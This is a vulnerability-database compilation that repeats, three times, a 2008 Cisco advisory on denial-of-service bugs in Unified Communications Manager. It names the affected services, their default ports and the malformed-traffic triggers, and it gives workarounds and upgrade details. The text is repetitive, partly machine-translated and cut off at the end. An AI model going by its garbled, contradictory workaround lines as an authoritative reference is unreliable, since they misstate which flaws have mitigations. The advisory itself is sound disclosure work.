Cisco Unified Communications Manager (CUCM) 5.x before 5.1(2) and 6.x before 6.1(1) allows remote attackers to cause a denial of service (service interruption) via a SIP JOIN message with a malformed header, aka Bug ID CSCsi48115. Cisco Unified Communications Manager (CUCM) There is a service disruption (DoS) Vulnerabilities exist. The problem is Bug ID : CSCsi48115 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. These issues affect the following components: Certificate Trust List (CTL) Provider Certificate Authority Proxy Function (CAPF) Session Initiation Protocol (SIP) Simple Network Management Protocol (SNMP) Trap An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. This vulnerability is reported in version 5.x. 2) Another error within the CTL Provider service can be exploited to consume large amounts of memory resources via a series of specially crafted packets sent to default port 2444/TCP. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, and 4.3. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and 6.x. SOLUTION: Update to the fixed versions. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. These vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version can also be determined by running the command show version active via the command line interface (CLI). No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CTL Provider service listens by default on TCP port 2444 and is user configurable. The CTL Provider service is enabled by default. There is a workaround for this vulnerability. The CTL Provider service listens by default on TCP port 2444 and is user configurable. There is a workaround for this vulnerability. Certificate Authority Proxy Function Related Vulnerability The Certificate Authority Proxy Function (CAPF) service of Cisco Unified Communications Manager versions 4.1, 4.2 and 4.3 contain a vulnerability when handling malformed input that may result in a DoS condition. The CAPF service listens by default on TCP port 3804 and is user configurable. The CAPF service is disabled by default. There is a workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. The SNMP Trap Agent service listens by default on UDP port 61441. There is a workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi98433 - CTLProvider leaks memory in certain scenarios CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46770 - CAPF crash with network traffic CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46944 - CCM service restarts on receiving a valid SIP Packet CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsl22355 - CCM does not validate SIP URL input properly CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441 CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities in this advisory may result in the interruption of voice services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. It can downloaded at the following link: http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2 Workarounds =========== CTL Provider Related Vulnerabilities To mitigate against the CTL Provider service vulnerabilities (CSCsj80609 and CSCsi98433), system administrators can disable the CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL Provider menu selection. It is possible to mitigate the CTL Provider vulnerabilities by implementing filtering on screening devices. If the CTL Provider service is enabled, permit access to TCP port 2444 only between the Cisco Unified Communications Manager systems where the CTL Provider service is active and the CTL Client, usually on the administrator's workstation, to mitigate the CTL Provider service overflow. Note: It is possible to change the default port of the CTL Provider service (TCP port 2444). If changed, filtering should be based on the values used. CAPF Related Vulnerability To mitigate against the CAPF service vulnerability (CSCsk46770), system administrators can disable the CAPF service if it is not needed. If phones are not configured to use certificates, then the CAPF service can be disabled. The CAPF service is controlled by the Cisco Certificate Authority Proxy Function menu selection. It is possible to mitigate the CAPF vulnerability by implementing filtering on screening devices. If the CAPF service is enabled, permit access to TCP port 3804 only from networks that contain IP phone devices needing to utilize the CAPF service. SIP-Related Vulnerabilities It is possible to mitigate the SIP vulnerabilities by implementing filtering on screening devices. SNMP Trap-Related Vulnerability To mitigate against the SNMP Trap service vulnerability (CSCsj24113), system administrators can disable the SNMP Trap service. To disable the Windows SNMP service, navigate to Start > Programs > Administrative Tools > Services, and stop the SNMP Service. Note: The SNMP Trap Service listed in the Windows Service configuration screen is not applicable to this vulnerability and disabling it does not provide any benefit as a workaround for this vulnerability. It is possible to mitigate the SNMP Trap service vulnerability by implementing filtering on screening devices. Permit access to UDP port 61441 only from management systems that need access to the SNMP Trap service. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. ustomers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were discovered internally by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW GpnghuWFfH2gIjp6Yk6857c= =L6xn -----END PGP SIGNATURE-----

The SNMP Trap Agent service in Cisco Unified Communications Manager (CUCM) 4.1 before 4.1(3)SR6, 4.2 before 4.2(3)SR3, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) allows remote attackers to cause a denial of service (core dump and service restart) via a series of malformed UDP packets, as demonstrated by the IP Stack Integrity Checker (ISIC), aka Bug ID CSCsj24113. Cisco Unified Communications Manager (CUCM) There is a service disruption (DoS) Vulnerabilities exist. The problem is Bug ID : CSCsj24113 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. These issues affect the following components: Certificate Trust List (CTL) Provider Certificate Authority Proxy Function (CAPF) Session Initiation Protocol (SIP) Simple Network Management Protocol (SNMP) Trap An attacker can exploit these issues to cause denial-of-service conditions in the affected application. CISCO AKA BUG number CSCsj24113. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. This vulnerability is reported in version 5.x. 2) Another error within the CTL Provider service can be exploited to consume large amounts of memory resources via a series of specially crafted packets sent to default port 2444/TCP. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, and 4.3. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and 6.x. SOLUTION: Update to the fixed versions. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. These vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version can also be determined by running the command show version active via the command line interface (CLI). No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CTL Provider service listens by default on TCP port 2444 and is user configurable. The CTL Provider service is enabled by default. There is a workaround for this vulnerability. The CTL Provider service listens by default on TCP port 2444 and is user configurable. There is a workaround for this vulnerability. Certificate Authority Proxy Function Related Vulnerability The Certificate Authority Proxy Function (CAPF) service of Cisco Unified Communications Manager versions 4.1, 4.2 and 4.3 contain a vulnerability when handling malformed input that may result in a DoS condition. The CAPF service listens by default on TCP port 3804 and is user configurable. The CAPF service is disabled by default. There is a workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. The SNMP Trap Agent service listens by default on UDP port 61441. There is a workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi98433 - CTLProvider leaks memory in certain scenarios CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46770 - CAPF crash with network traffic CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46944 - CCM service restarts on receiving a valid SIP Packet CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsl22355 - CCM does not validate SIP URL input properly CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441 CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities in this advisory may result in the interruption of voice services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. It can downloaded at the following link: http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2 Workarounds =========== CTL Provider Related Vulnerabilities To mitigate against the CTL Provider service vulnerabilities (CSCsj80609 and CSCsi98433), system administrators can disable the CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL Provider menu selection. It is possible to mitigate the CTL Provider vulnerabilities by implementing filtering on screening devices. If the CTL Provider service is enabled, permit access to TCP port 2444 only between the Cisco Unified Communications Manager systems where the CTL Provider service is active and the CTL Client, usually on the administrator's workstation, to mitigate the CTL Provider service overflow. Note: It is possible to change the default port of the CTL Provider service (TCP port 2444). If changed, filtering should be based on the values used. CAPF Related Vulnerability To mitigate against the CAPF service vulnerability (CSCsk46770), system administrators can disable the CAPF service if it is not needed. If phones are not configured to use certificates, then the CAPF service can be disabled. The CAPF service is controlled by the Cisco Certificate Authority Proxy Function menu selection. It is possible to mitigate the CAPF vulnerability by implementing filtering on screening devices. If the CAPF service is enabled, permit access to TCP port 3804 only from networks that contain IP phone devices needing to utilize the CAPF service. SIP-Related Vulnerabilities It is possible to mitigate the SIP vulnerabilities by implementing filtering on screening devices. SNMP Trap-Related Vulnerability To mitigate against the SNMP Trap service vulnerability (CSCsj24113), system administrators can disable the SNMP Trap service. To disable the Windows SNMP service, navigate to Start > Programs > Administrative Tools > Services, and stop the SNMP Service. Note: The SNMP Trap Service listed in the Windows Service configuration screen is not applicable to this vulnerability and disabling it does not provide any benefit as a workaround for this vulnerability. It is possible to mitigate the SNMP Trap service vulnerability by implementing filtering on screening devices. Permit access to UDP port 61441 only from management systems that need access to the SNMP Trap service. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. ustomers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were discovered internally by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW GpnghuWFfH2gIjp6Yk6857c= =L6xn -----END PGP SIGNATURE-----

Unspecified vulnerability in Cisco Unified Communications Manager 4.1 before 4.1(3)SR6, 4.2 before 4.2(3)SR3, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) allows remote attackers to cause a denial of service (CCM service restart) via an unspecified SIP INVITE message, aka Bug ID CSCsk46944. Cisco Unified Communications Manager There is a service disruption (DoS) An unknown vulnerability exists. The problem is Bug ID : CSCsk46944 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. These issues affect the following components: Certificate Trust List (CTL) Provider Certificate Authority Proxy Function (CAPF) Session Initiation Protocol (SIP) Simple Network Management Protocol (SNMP) Trap An attacker can exploit these issues to cause denial-of-service conditions in the affected application. The vulnerability stems from the failure of the network system or product to properly validate the input data. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. This vulnerability is reported in version 5.x. 2) Another error within the CTL Provider service can be exploited to consume large amounts of memory resources via a series of specially crafted packets sent to default port 2444/TCP. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, and 4.3. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and 6.x. SOLUTION: Update to the fixed versions. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. These vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version can also be determined by running the command show version active via the command line interface (CLI). No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CTL Provider service listens by default on TCP port 2444 and is user configurable. The CTL Provider service is enabled by default. There is a workaround for this vulnerability. The CTL Provider service listens by default on TCP port 2444 and is user configurable. There is a workaround for this vulnerability. The CAPF service listens by default on TCP port 3804 and is user configurable. The CAPF service is disabled by default. There is a workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. The SNMP Trap Agent service listens by default on UDP port 61441. There is a workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi98433 - CTLProvider leaks memory in certain scenarios CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46770 - CAPF crash with network traffic CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46944 - CCM service restarts on receiving a valid SIP Packet CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsl22355 - CCM does not validate SIP URL input properly CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441 CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities in this advisory may result in the interruption of voice services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. It can downloaded at the following link: http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2 Workarounds =========== CTL Provider Related Vulnerabilities To mitigate against the CTL Provider service vulnerabilities (CSCsj80609 and CSCsi98433), system administrators can disable the CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL Provider menu selection. It is possible to mitigate the CTL Provider vulnerabilities by implementing filtering on screening devices. If the CTL Provider service is enabled, permit access to TCP port 2444 only between the Cisco Unified Communications Manager systems where the CTL Provider service is active and the CTL Client, usually on the administrator's workstation, to mitigate the CTL Provider service overflow. Note: It is possible to change the default port of the CTL Provider service (TCP port 2444). If changed, filtering should be based on the values used. CAPF Related Vulnerability To mitigate against the CAPF service vulnerability (CSCsk46770), system administrators can disable the CAPF service if it is not needed. If phones are not configured to use certificates, then the CAPF service can be disabled. The CAPF service is controlled by the Cisco Certificate Authority Proxy Function menu selection. It is possible to mitigate the CAPF vulnerability by implementing filtering on screening devices. If the CAPF service is enabled, permit access to TCP port 3804 only from networks that contain IP phone devices needing to utilize the CAPF service. SIP-Related Vulnerabilities It is possible to mitigate the SIP 